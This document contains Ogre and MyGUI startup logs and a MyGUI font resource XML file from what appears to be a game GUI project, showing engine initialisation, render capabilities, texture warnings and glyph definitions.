```18:23:57 | Platform | Info | * Initialise: RenderManager | G:\development\MyGUI\source\Platforms\Ogre\OgrePlatform\src\MyGUI_OgreRenderManager.cpp | 43 18:23:57 | Platform | Info | RenderManager successfully initialized | G:\development\MyGUI\source\Platforms\Ogre\OgrePlatform\src\MyGUI_OgreRenderManager.cpp | 71 18:23:57 | Platform | Info | * Initialise: DataManager | G:\development\MyGUI\source\Platforms\Ogre\OgrePlatform\src\MyGUI_OgreDataManager.cpp | 27 18:23:57 | Platform | Info | DataManager successfully initialized | G:\development\MyGUI\source\Platforms\Ogre\OgrePlatform\src\MyGUI_OgreDataManager.cpp | 35 18:23:57 | Core | Info | * Initialise: Gui | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_Gui.cpp | 75 18:23:57 | Core | Info | * MyGUI version 3.2.0 | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_Gui.cpp | 87 18:23:57 | Core | Info | * Initialise: ResourceManager | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ResourceManager.cpp | 48 18:23:57 | Core | Info | ResourceManager successfully initialized | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ResourceManager.cpp | 56 18:23:57 | Core | Info | * Initialise: LayerManager | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_LayerManager.cpp | 49 18:23:57 | Core | Info | LayerManager successfully initialized | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_LayerManager.cpp | 57 18:23:57 | Core | Info | * Initialise: WidgetManager | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_WidgetManager.cpp | 67 18:23:57 | Core | Info | WidgetManager successfully initialized | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_WidgetManager.cpp | 98 18:23:57 | Core | Info | * Initialise: InputManager | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_InputManager.cpp | 58 18:23:57 | Core | Info | InputManager successfully initialized | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_InputManager.cpp | 78 18:23:57 | Core | Info | * Initialise: SubWidgetManager | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_SubWidgetManager.cpp | 49 18:23:57 | Core | Info | SubWidgetManager successfully initialized | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_SubWidgetManager.cpp | 69 18:23:57 | Core | Info | * Initialise: SkinManager | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_SkinManager.cpp | 53 18:23:57 | Core | Info | SkinManager successfully initialized | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_SkinManager.cpp | 61 18:23:57 | Core | Info | * Initialise: FontManager | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_FontManager.cpp | 48 18:23:57 | Core | Info | FontManager successfully initialized | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_FontManager.cpp | 57 18:23:57 | Core | Info | * Initialise: ControllerManager | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ControllerManager.cpp | 46 18:23:57 | Core | Info | ControllerManager successfully initialized | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ControllerManager.cpp | 56 18:23:57 | Core | Info | * Initialise: PointerManager | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_PointerManager.cpp | 60 18:23:57 | Core | Info | PointerManager successfully initialized | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_PointerManager.cpp | 78 18:23:57 | Core | Info | * Initialise: ClipboardManager | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ClipboardManager.cpp | 87 18:23:57 | Core | Info | ClipboardManager successfully initialized | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ClipboardManager.cpp | 101 18:23:57 | 
Core | Info | * Initialise: LayoutManager | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_LayoutManager.cpp | 45 18:23:57 | Core | Info | LayoutManager successfully initialized | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_LayoutManager.cpp | 50 18:23:57 | Core | Info | * Initialise: DynLibManager | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_DynLibManager.cpp | 41 18:23:57 | Core | Info | DynLibManager successfully initialized | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_DynLibManager.cpp | 45 18:23:57 | Core | Info | * Initialise: PluginManager | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_PluginManager.cpp | 45 18:23:57 | Core | Info | PluginManager successfully initialized | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_PluginManager.cpp | 49 18:23:57 | Core | Info | * Initialise: LanguageManager | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_LanguageManager.cpp | 45 18:23:57 | Core | Info | LanguageManager successfully initialized | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_LanguageManager.cpp | 49 18:23:57 | Core | Info | * Initialise: FactoryManager | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_FactoryManager.cpp | 40 18:23:57 | Core | Info | FactoryManager successfully initialized | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_FactoryManager.cpp | 42 18:23:57 | Core | Info | * Initialise: ToolTipManager | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ToolTipManager.cpp | 48 18:23:57 | Core | Info | ToolTipManager successfully initialized | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ToolTipManager.cpp | 60 18:23:57 | Core | Info | Load ini file 'MyGUI_Fonts.xml' | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ResourceManager.cpp | 130 18:23:57 | Core | Info | ResourceTrueTypeFont: Font 'DejaVuSansFont.15' using texture size 128 x 256. | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ResourceTrueTypeFont.cpp | 674 18:23:57 | Core | Info | ResourceTrueTypeFont: Font 'DejaVuSansFont.15' using real height 17 pixels. | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ResourceTrueTypeFont.cpp | 675 18:24:02 | Core | Info | ResourceTrueTypeFont: Font 'Arial' using texture size 512 x 512. | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ResourceTrueTypeFont.cpp | 674 18:24:02 | Core | Info | ResourceTrueTypeFont: Font 'Arial' using real height 16 pixels. | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ResourceTrueTypeFont.cpp | 675 18:24:06 | Core | Info | ResourceTrueTypeFont: Font 'BlackForest' using texture size 128 x 128. | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ResourceTrueTypeFont.cpp | 674 18:24:06 | Core | Info | ResourceTrueTypeFont: Font 'BlackForest' using real height 14 pixels. 
| G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ResourceTrueTypeFont.cpp | 675 18:24:06 | Core | Info | Load ini file 'MyGUI_Images.xml' | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ResourceManager.cpp | 130 18:24:06 | Core | Info | Load ini file 'MyGUI_CommonSkins.xml' | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ResourceManager.cpp | 130 18:24:06 | Core | Info | Register value : 'HCenter' = 0 | g:\development\mygui\source\myguiengine\include\MyGUI_Align.h | 238 18:24:06 | Core | Info | Register value : 'VCenter' = 0 | g:\development\mygui\source\myguiengine\include\MyGUI_Align.h | 239 18:24:06 | Core | Info | Register value : 'Center' = 0 | g:\development\mygui\source\myguiengine\include\MyGUI_Align.h | 240 18:24:06 | Core | Info | Register value : 'Left' = 2 | g:\development\mygui\source\myguiengine\include\MyGUI_Align.h | 241 18:24:06 | Core | Info | Register value : 'Right' = 4 | g:\development\mygui\source\myguiengine\include\MyGUI_Align.h | 242 18:24:06 | Core | Info | Register value : 'HStretch' = 6 | g:\development\mygui\source\myguiengine\include\MyGUI_Align.h | 243 18:24:06 | Core | Info | Register value : 'Top' = 8 | g:\development\mygui\source\myguiengine\include\MyGUI_Align.h | 244 18:24:06 | Core | Info | Register value : 'Bottom' = 16 | g:\development\mygui\source\myguiengine\include\MyGUI_Align.h | 245 18:24:06 | Core | Info | Register value : 'VStretch' = 24 | g:\development\mygui\source\myguiengine\include\MyGUI_Align.h | 246 18:24:06 | Core | Info | Register value : 'Stretch' = 30 | g:\development\mygui\source\myguiengine\include\MyGUI_Align.h | 247 18:24:06 | Core | Info | Register value : 'Default' = 10 | g:\development\mygui\source\myguiengine\include\MyGUI_Align.h | 248 18:24:06 | Core | Info | Load ini file 'MyGUI_BlueWhiteTheme.xml' | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ResourceManager.cpp | 130 18:24:06 | Core | Info | Load ini file 'MyGUI_BlueWhiteImages.xml' | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ResourceManager.cpp | 130 18:24:06 | Core | Info | Load ini file 'MyGUI_BlueWhiteSkins.xml' | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ResourceManager.cpp | 130 18:24:07 | Core | Info | Load ini file 'MyGUI_BlueWhiteTemplates.xml' | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ResourceManager.cpp | 130 18:24:07 | Core | Info | Load ini file 'MyGUI_Pointers.xml' | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ResourceManager.cpp | 130 18:24:07 | Core | Info | Load ini file 'MyGUI_Layers.xml' | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ResourceManager.cpp | 130 18:24:07 | Core | Info | Load ini file 'MyGUI_Settings.xml' | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_ResourceManager.cpp | 130 18:24:08 | Core | Info | Gui successfully initialized | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_Gui.cpp | 133 18:24:08 | Core | Warning | Widget property 'Texture' not found [ifc_login.layout] | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_Widget.cpp | 1178 18:24:08 | Core | Warning | Texture 'ifc_login.png' have non power of two size | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_TextureUtility.cpp | 76 18:24:13 | Core | Warning | Widget property 'Texture' not found [ifc_main.layout] | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_Widget.cpp | 1178 18:24:13 | Core | Warning | Texture 'ifc_main.png' have non power of two size | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_TextureUtility.cpp | 76 18:24:14 | Core | Warning | Widget property 'Texture' not found [ifc_cr_race.layout] | 
G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_Widget.cpp | 1178 18:24:15 | Core | Warning | Texture 'ifc_cr_race.png' have non power of two size | G:\development\MyGUI\source\MyGUIEngine\src\MyGUI_TextureUtility.cpp | 76 ```
```18:23:51: Creating resource group General 18:23:51: Creating resource group Internal 18:23:51: Creating resource group Autodetect 18:23:51: SceneManagerFactory for type 'DefaultSceneManager' registered. 18:23:51: Registering ResourceManager for type Material 18:23:51: Registering ResourceManager for type Mesh 18:23:51: Registering ResourceManager for type Skeleton 18:23:51: MovableObjectFactory for type 'ParticleSystem' registered. 18:23:51: OverlayElementFactory for type Panel registered. 18:23:51: OverlayElementFactory for type BorderPanel registered. 18:23:51: OverlayElementFactory for type TextArea registered. 18:23:51: Registering ResourceManager for type Font 18:23:51: ArchiveFactory for archive type FileSystem registered. 18:23:51: ArchiveFactory for archive type Zip registered. 18:23:51: ArchiveFactory for archive type EmbeddedZip registered. 18:23:51: DDS codec registering 18:23:51: FreeImage version: 3.13.1 18:23:51: This program uses FreeImage, a free, open source image library supporting all common bitmap formats. See http://freeimage.sourceforge.net for details 18:23:51: Supported formats: bmp,ico,jpg,jif,jpeg,jpe,jng,koa,iff,lbm,mng,pbm,pbm,pcd,pcx,pgm,pgm,png,ppm,ppm,ras,tga,targa,tif,tiff,wap,wbmp,wbm,psd,cut,xbm,xpm,gif,hdr,g3,sgi,exr,j2k,j2c,jp2,pfm,pct,pict,pic,bay,bmq,cr2,crw,cs1,dc2,dcr,dng,erf,fff,hdr,k25,kdc,mdc,mos,mrw,nef,orf,pef,pxn,raf,raw,rdc,sr2,srf,arw,3fr,cine,ia,kc2,mef,nrw,qtk,rw2,sti,drf,dsc,ptx,cap,iiq,rwz 18:23:51: Registering ResourceManager for type HighLevelGpuProgram 18:23:51: Registering ResourceManager for type Compositor 18:23:51: MovableObjectFactory for type 'Entity' registered. 18:23:51: MovableObjectFactory for type 'Light' registered. 18:23:51: MovableObjectFactory for type 'BillboardSet' registered. 18:23:51: MovableObjectFactory for type 'ManualObject' registered. 18:23:51: MovableObjectFactory for type 'BillboardChain' registered. 18:23:51: MovableObjectFactory for type 'RibbonTrail' registered. 18:23:51: Loading library .\RenderSystem_Direct3D9_d 18:23:52: Installing plugin: D3D9 RenderSystem 18:23:52: D3D9 : Direct3D9 Rendering Subsystem created. 18:23:52: D3D9: Driver Detection Starts 18:23:52: D3D9: Driver Detection Ends 18:23:52: Plugin successfully installed 18:23:52: Loading library .\RenderSystem_GL_d 18:23:52: Installing plugin: GL RenderSystem 18:23:52: OpenGL Rendering Subsystem created. 
18:23:53: Plugin successfully installed 18:23:53: Loading library .\Plugin_ParticleFX_d 18:23:53: Installing plugin: ParticleFX 18:23:53: Particle Emitter Type 'Point' registered 18:23:53: Particle Emitter Type 'Box' registered 18:23:53: Particle Emitter Type 'Ellipsoid' registered 18:23:53: Particle Emitter Type 'Cylinder' registered 18:23:53: Particle Emitter Type 'Ring' registered 18:23:53: Particle Emitter Type 'HollowEllipsoid' registered 18:23:53: Particle Affector Type 'LinearForce' registered 18:23:53: Particle Affector Type 'ColourFader' registered 18:23:53: Particle Affector Type 'ColourFader2' registered 18:23:53: Particle Affector Type 'ColourImage' registered 18:23:53: Particle Affector Type 'ColourInterpolator' registered 18:23:53: Particle Affector Type 'Scaler' registered 18:23:53: Particle Affector Type 'Rotator' registered 18:23:53: Particle Affector Type 'DirectionRandomiser' registered 18:23:53: Particle Affector Type 'DeflectorPlane' registered 18:23:53: Plugin successfully installed 18:23:53: Loading library .\Plugin_BSPSceneManager_d 18:23:53: Installing plugin: BSP Scene Manager 18:23:53: Plugin successfully installed 18:23:53: Loading library .\Plugin_CgProgramManager_d 18:23:54: Installing plugin: Cg Program Manager 18:23:54: Plugin successfully installed 18:23:54: Loading library .\Plugin_PCZSceneManager_d 18:23:54: Installing plugin: Portal Connected Zone Scene Manager 18:23:54: PCZone Factory Type 'ZoneType_Default' registered 18:23:54: Plugin successfully installed 18:23:54: Loading library .\Plugin_OctreeZone_d 18:23:54: Installing plugin: Octree Zone Factory 18:23:54: Plugin successfully installed 18:23:54: Loading library .\Plugin_OctreeSceneManager_d 18:23:54: Installing plugin: Octree Scene Manager 18:23:54: Plugin successfully installed 18:23:54: *-*-* OGRE Initialising 18:23:54: *-*-* Version 1.8.0unstable (Byatis) 18:23:54: Added resource location 'gui' of type 'FileSystem' to resource group 'General' 18:23:54: D3D9 : RenderSystem Option: Allow NVPerfHUD = No 18:23:54: D3D9 : RenderSystem Option: FSAA = 0 18:23:54: D3D9 : RenderSystem Option: Fixed Pipeline Enabled = Yes 18:23:54: D3D9 : RenderSystem Option: Floating-point mode = Fastest 18:23:54: D3D9 : RenderSystem Option: Full Screen = No 18:23:54: D3D9 : RenderSystem Option: Multi device memory hint = Use minimum system memory 18:23:54: D3D9 : RenderSystem Option: Rendering Device = Monitor-1-ATI Radeon HD 5450 18:23:54: D3D9 : RenderSystem Option: Resource Creation Policy = Create on all devices 18:23:54: D3D9 : RenderSystem Option: VSync = No 18:23:54: D3D9 : RenderSystem Option: VSync Interval = 1 18:23:54: D3D9 : RenderSystem Option: Video Mode = 1680 x 1050 @ 32-bit colour 18:23:54: D3D9 : RenderSystem Option: sRGB Gamma Conversion = No 18:23:55: CPU Identifier & Features 18:23:55: ------------------------- 18:23:55: * CPU ID: AuthenticAMD: AMD Athlon(tm) II X2 250 Processor 18:23:55: * SSE: yes 18:23:55: * SSE2: yes 18:23:55: * SSE3: yes 18:23:55: * MMX: yes 18:23:55: * MMXEXT: yes 18:23:55: * 3DNOW: yes 18:23:55: * 3DNOWEXT: yes 18:23:55: * CMOV: yes 18:23:55: * TSC: yes 18:23:55: * FPU: yes 18:23:55: * PRO: yes 18:23:55: * HT: no 18:23:55: ------------------------- 18:23:55: D3D9 : Subsystem Initialising 18:23:55: Registering ResourceManager for type Texture 18:23:55: Registering ResourceManager for type GpuProgram 18:23:55: D3D9RenderSystem::_createRenderWindow "TutorialApplication Render Window", 1680x1050 windowed miscParams: FSAA=0 FSAAHint= colourDepth=32 gamma=false monitorIndex=0 
useNVPerfHUD=false vsync=false vsyncInterval=1 18:23:56: D3D9 : Created D3D9 Rendering Window 'TutorialApplication Render Window' : 1664x982, 32bpp 18:23:56: D3D9 : WARNING - disabling VSync in windowed mode can cause timing issues at lower frame rates, turn VSync on if you observe this problem. 18:23:56: D3D9: Vertex texture format supported - PF_L8 18:23:56: D3D9: Vertex texture format supported - PF_L16 18:23:56: D3D9: Vertex texture format supported - PF_A8 18:23:56: D3D9: Vertex texture format supported - PF_A4L4 18:23:56: D3D9: Vertex texture format supported - PF_BYTE_LA 18:23:56: D3D9: Vertex texture format supported - PF_R5G6B5 18:23:56: D3D9: Vertex texture format supported - PF_B5G6R5 18:23:56: D3D9: Vertex texture format supported - PF_A4R4G4B4 18:23:56: D3D9: Vertex texture format supported - PF_A1R5G5B5 18:23:56: D3D9: Vertex texture format supported - PF_A8R8G8B8 18:23:56: D3D9: Vertex texture format supported - PF_B8G8R8A8 18:23:56: D3D9: Vertex texture format supported - PF_A2R10G10B10 18:23:56: D3D9: Vertex texture format supported - PF_A2B10G10R10 18:23:56: D3D9: Vertex texture format supported - PF_DXT1 18:23:56: D3D9: Vertex texture format supported - PF_DXT2 18:23:56: D3D9: Vertex texture format supported - PF_DXT3 18:23:56: D3D9: Vertex texture format supported - PF_DXT4 18:23:56: D3D9: Vertex texture format supported - PF_DXT5 18:23:56: D3D9: Vertex texture format supported - PF_FLOAT16_RGB 18:23:56: D3D9: Vertex texture format supported - PF_FLOAT16_RGBA 18:23:56: D3D9: Vertex texture format supported - PF_FLOAT32_RGB 18:23:56: D3D9: Vertex texture format supported - PF_FLOAT32_RGBA 18:23:56: D3D9: Vertex texture format supported - PF_X8R8G8B8 18:23:56: D3D9: Vertex texture format supported - PF_X8B8G8R8 18:23:56: D3D9: Vertex texture format supported - PF_R8G8B8A8 18:23:56: D3D9: Vertex texture format supported - PF_DEPTH 18:23:56: D3D9: Vertex texture format supported - PF_SHORT_RGBA 18:23:56: D3D9: Vertex texture format supported - PF_FLOAT16_R 18:23:56: D3D9: Vertex texture format supported - PF_FLOAT32_R 18:23:56: D3D9: Vertex texture format supported - PF_SHORT_GR 18:23:56: D3D9: Vertex texture format supported - PF_FLOAT16_GR 18:23:56: D3D9: Vertex texture format supported - PF_FLOAT32_GR 18:23:56: D3D9: Vertex texture format supported - PF_SHORT_RGB 18:23:56: D3D9: Vertex texture format supported - PF_PVRTC_RGB2 18:23:56: D3D9: Vertex texture format supported - PF_PVRTC_RGBA2 18:23:56: D3D9: Vertex texture format supported - PF_PVRTC_RGB4 18:23:56: D3D9: Vertex texture format supported - PF_PVRTC_RGBA4 18:23:56: D3D9: Vertex texture format supported - PF_R8 18:23:56: D3D9: Vertex texture format supported - PF_RG8 18:23:56: RenderSystem capabilities 18:23:56: ------------------------- 18:23:56: RenderSystem Name: Direct3D9 Rendering Subsystem 18:23:56: GPU Vendor: ati 18:23:56: Device Name: Monitor-1-ATI Radeon HD 5450 18:23:56: Driver Version: 8.17.10.1124 18:23:56: * Fixed function pipeline: yes 18:23:56: * Hardware generation of mipmaps: yes 18:23:56: * Texture blending: yes 18:23:56: * Anisotropic texture filtering: yes 18:23:56: * Dot product texture operation: yes 18:23:56: * Cube mapping: yes 18:23:56: * Hardware stencil buffer: yes 18:23:56: - Stencil depth: 8 18:23:56: - Two sided stencil support: yes 18:23:56: - Wrap stencil values: yes 18:23:56: * Hardware vertex / index buffers: yes 18:23:56: * Vertex programs: yes 18:23:56: * Number of floating-point constants for vertex programs: 256 18:23:56: * Number of integer constants for vertex programs: 
16 18:23:56: * Number of boolean constants for vertex programs: 16 18:23:56: * Fragment programs: yes 18:23:56: * Number of floating-point constants for fragment programs: 224 18:23:56: * Number of integer constants for fragment programs: 16 18:23:56: * Number of boolean constants for fragment programs: 16 18:23:56: * Geometry programs: no 18:23:56: * Number of floating-point constants for geometry programs: 0 18:23:56: * Number of integer constants for geometry programs: 0 18:23:56: * Number of boolean constants for geometry programs: 0 18:23:56: * Supported Shader Profiles: hlsl ps_1_1 ps_1_2 ps_1_3 ps_1_4 ps_2_0 ps_2_a ps_2_b ps_2_x ps_3_0 vs_1_1 vs_2_0 vs_2_a vs_2_x vs_3_0 18:23:56: * Texture Compression: yes 18:23:56: - DXT: yes 18:23:56: - VTC: no 18:23:56: - PVRTC: no 18:23:56: * Scissor Rectangle: yes 18:23:56: * Hardware Occlusion Query: yes 18:23:56: * User clip planes: yes 18:23:56: * VET_UBYTE4 vertex element type: yes 18:23:56: * Infinite far plane projection: yes 18:23:56: * Hardware render-to-texture: yes 18:23:56: * Floating point textures: yes 18:23:56: * Non-power-of-two textures: yes 18:23:56: * Volume textures: yes 18:23:56: * Multiple Render Targets: 4 18:23:56: - With different bit depths: yes 18:23:56: * Point Sprites: yes 18:23:56: * Extended point parameters: yes 18:23:56: * Max Point Size: 256 18:23:56: * Vertex texture fetch: yes 18:23:56: * Number of world matrices: 0 18:23:56: * Number of texture units: 8 18:23:56: * Stencil buffer depth: 8 18:23:56: * Number of vertex blend matrices: 0 18:23:56: - Max vertex textures: 4 18:23:56: - Vertex textures shared: no 18:23:56: * Render to Vertex Buffer : no 18:23:56: * DirectX per stage constants: yes 18:23:56: *************************************** 18:23:56: *** D3D9 : Subsystem Initialised OK *** 18:23:56: *************************************** 18:23:56: DefaultWorkQueue('Root') initialising on thread main. 18:23:56: Particle Renderer Type 'billboard' registered 18:23:56: SceneManagerFactory for type 'BspSceneManager' registered. 18:23:56: Registering ResourceManager for type BspLevel 18:23:56: SceneManagerFactory for type 'PCZSceneManager' registered. 18:23:56: MovableObjectFactory for type 'PCZLight' registered. 18:23:56: MovableObjectFactory for type 'Portal' registered. 18:23:56: MovableObjectFactory for type 'AntiPortal' registered. 18:23:56: PCZone Factory Type 'ZoneType_Octree' registered 18:23:56: SceneManagerFactory for type 'OctreeSceneManager' registered. 18:23:56: Parsing scripts for resource group Autodetect 18:23:56: Finished parsing scripts for resource group Autodetect 18:23:56: Creating resources for group Autodetect 18:23:56: All done 18:23:56: Parsing scripts for resource group General 18:23:56: Finished parsing scripts for resource group General 18:23:56: Creating resources for group General 18:23:56: All done 18:23:56: Parsing scripts for resource group Internal 18:23:56: Finished parsing scripts for resource group Internal 18:23:56: Creating resources for group Internal 18:23:56: All done 18:24:07: Texture: MyGUI_BlueWhiteSkins.png: Loading 1 faces(PF_A8R8G8B8,512x256x1) with 0 generated mipmaps from Image. Internal format is PF_A8R8G8B8,512x256x1. 18:24:08: Texture: MyGUI_Pointers.png: Loading 1 faces(PF_A8R8G8B8,256x128x1) with 0 generated mipmaps from Image. Internal format is PF_A8R8G8B8,256x128x1. 18:24:08: Texture: ifc_login.png: Loading 1 faces(PF_A8R8G8B8,1440x900x1) with 0 generated mipmaps from Image. Internal format is PF_A8R8G8B8,1440x900x1. 
18:24:08: *** Initializing OIS *** 18:24:13: Texture: ifc_main.png: Loading 1 faces(PF_A8R8G8B8,1440x900x1) with 0 generated mipmaps from Image. Internal format is PF_A8R8G8B8,1440x900x1. 18:24:15: Texture: ifc_cr_race.png: Loading 1 faces(PF_A8R8G8B8,1440x900x1) with 0 generated mipmaps from Image. Internal format is PF_A8R8G8B8,1440x900x1. ```
```<?xml version="1.0" encoding="UTF-8"?> <MyGUI type="Resource" version="1.1"> <Resource type="ResourceTrueTypeFont" name="font_DejaVuSans.17"> <Property key="Source" value="DejaVuSans.ttf"/> <Property key="Size" value="19"/> <Property key="Resolution" value="50"/> <Property key="Antialias" value="false"/> <Property key="SpaceWidth" value="4"/> <Property key="TabWidth" value="8"/> <Property key="CursorWidth" value="2"/> <Property key="Distance" value="6"/> <Property key="OffsetHeight" value="0"/> <Codes> <Code range="33 126"/> <Code range="1025 1105"/> <Code range="8470"/> <Code hide="128"/> <Code hide="1026 1039"/> <Code hide="1104"/> </Codes> </Resource> <Resource type="ResourceTrueTypeFont" name="Arial"> <Property key="Source" value="arial.ttf"/> <Property key="Size" value="19"/> <Property key="Resolution" value="50"/> <Property key="Antialias" value="false"/> <Property key="SpaceWidth" value="4"/> <Property key="TabWidth" value="8"/> <Property key="CursorWidth" value="2"/> <Property key="Distance" value="6"/> <Property key="OffsetHeight" value="0"/> </Resource> <Resource type="ResourceTrueTypeFont" name="Black_Forest"> <Property key="Source" value="blackforest.ttf"/> <Property key="Size" value="19"/> <Property key="Resolution" value="50"/> <Property key="Antialias" value="false"/> <Property key="SpaceWidth" value="4"/> <Property key="TabWidth" value="8"/> <Property key="CursorWidth" value="2"/> <Property key="Distance" value="6"/> <Property key="OffsetHeight" value="0"/> </Resource> <Resource type="ResourceTrueTypeFont" name="font_DejaVuSans.14"> <Property key="Source" value="DejaVuSans.ttf"/> <Property key="Size" value="16"/> <Property key="Resolution" value="50"/> <Property key="Antialias" value="false"/> <Property key="SpaceWidth" value="4"/> <Property key="TabWidth" value="8"/> <Property key="CursorWidth" value="2"/> <Property key="Distance" value="7"/> <Property key="OffsetHeight" value="0"/> <Codes> <Code range="33 126"/> <Code range="1025 1105"/> <Code range="8470"/> <Code hide="128"/> <Code hide="1026 1039"/> <Code hide="1104"/> </Codes> </Resource> <Resource type="ResourceManualFont" name="font_Micro.11"> <Property key="Source" value="core_micro_font.PNG"/> <Property key="DefaultHeight" value="11"/> <Codes> <!--cursor--> <Code index="cursor" coord="10 5 2 4"/> <!--selected--> <Code index="selected" coord="22 5 2 4"/> <Code index="selected_back" coord="32 5 2 4"/> <!--space--> <Code index="32" coord="60 2 4 11"/> <!--tab--> <Code index="9" coord="50 2 14 11"/> <!--symbol--> <Code index="33" coord="70 2 2 11"/> <Code index="34" coord="80 2 4 11"/> <Code index="35" coord="90 2 7 11"/> <Code index="36" coord="100 2 6 11"/> <Code index="37" coord="110 2 8 11"/> <Code index="38" coord="120 2 7 11"/> <Code index="39" coord="130 2 2 11"/> <Code index="40" coord="140 2 3 11"/> <Code index="41" coord="150 2 3 11"/> <Code index="42" coord="160 2 6 11"/> <Code index="43" coord="170 2 6 11"/> <Code index="44" coord="180 2 3 11"/> <Code index="45" coord="190 2 6 11"/> <Code index="46" coord="200 2 2 11"/> <Code index="47" coord="210 2 5 11"/> <Code index="58" coord="320 2 2 11"/> <Code index="59" coord="330 2 3 11"/> <Code index="60" coord="340 2 4 11"/> <Code index="61" coord="350 2 6 11"/> <Code index="62" coord="360 2 4 11"/> <Code index="63" coord="370 2 6 11"/> <Code index="64" coord="380 2 6 11"/> <Code index="91" coord="270 14 4 11"/> <Code index="92" coord="280 14 5 11"/> <Code index="93" coord="290 14 4 11"/> <Code index="94" coord="300 14 6 11"/> <Code index="95" coord="310 14 6 
11"/> <Code index="96" coord="320 14 3 11"/> <Code index="123" coord="270 26 4 11"/> <Code index="124" coord="280 26 2 11"/> <Code index="125" coord="290 26 4 11"/> <Code index="126" coord="300 26 6 11"/> <!--0-9--> <Code index="48" coord="220 2 6 11"/> <Code index="49" coord="230 2 4 11"/> <Code index="50" coord="240 2 6 11"/> <Code index="51" coord="250 2 6 11"/> <Code index="52" coord="260 2 6 11"/> <Code index="53" coord="270 2 6 11"/> <Code index="54" coord="280 2 6 11"/> <Code index="55" coord="290 2 6 11"/> <Code index="56" coord="300 2 6 11"/> <Code index="57" coord="310 2 6 11"/> <!--A-Z--> <Code index="65" coord="10 14 6 11"/> <Code index="66" coord="20 14 6 11"/> <Code index="67" coord="30 14 6 11"/> <Code index="68" coord="40 14 6 11"/> <Code index="69" coord="50 14 5 11"/> <Code index="70" coord="60 14 5 11"/> <Code index="71" coord="70 14 6 11"/> <Code index="72" coord="80 14 6 11"/> <Code index="73" coord="90 14 2 11"/> <Code index="74" coord="100 14 5 11"/> <Code index="75" coord="110 14 6 11"/> <Code index="76" coord="120 14 5 11"/> <Code index="77" coord="130 14 8 11"/> <Code index="78" coord="140 14 6 11"/> <Code index="79" coord="150 14 6 11"/> <Code index="80" coord="160 14 6 11"/> <Code index="81" coord="170 14 6 11"/> <Code index="82" coord="180 14 6 11"/> <Code index="83" coord="190 14 6 11"/> <Code index="84" coord="200 14 6 11"/> <Code index="85" coord="210 14 6 11"/> <Code index="86" coord="220 14 6 11"/> <Code index="87" coord="230 14 8 11"/> <Code index="88" coord="240 14 6 11"/> <Code index="89" coord="250 14 6 11"/> <Code index="90" coord="260 14 6 11"/> <!--a-z--> <Code index="97" coord="10 26 6 11"/> <Code index="98" coord="20 26 6 11"/> <Code index="99" coord="30 26 6 11"/> <Code index="100" coord="40 26 6 11"/> <Code index="101" coord="50 26 6 11"/> <Code index="102" coord="60 26 5 11"/> <Code index="103" coord="70 26 6 11"/> <Code index="104" coord="80 26 6 11"/> <Code index="105" coord="90 26 2 11"/> <Code index="106" coord="100 26 4 11"/> <Code index="107" coord="110 26 6 11"/> <Code index="108" coord="120 26 2 11"/> <Code index="109" coord="130 26 8 11"/> <Code index="110" coord="140 26 6 11"/> <Code index="111" coord="150 26 6 11"/> <Code index="112" coord="160 26 6 11"/> <Code index="113" coord="170 26 6 11"/> <Code index="114" coord="180 26 5 11"/> <Code index="115" coord="190 26 6 11"/> <Code index="116" coord="200 26 6 11"/> <Code index="117" coord="210 26 6 11"/> <Code index="118" coord="220 26 6 11"/> <Code index="119" coord="230 26 8 11"/> <Code index="120" coord="240 26 6 11"/> <Code index="121" coord="250 26 6 11"/> <Code index="122" coord="260 26 6 11"/> 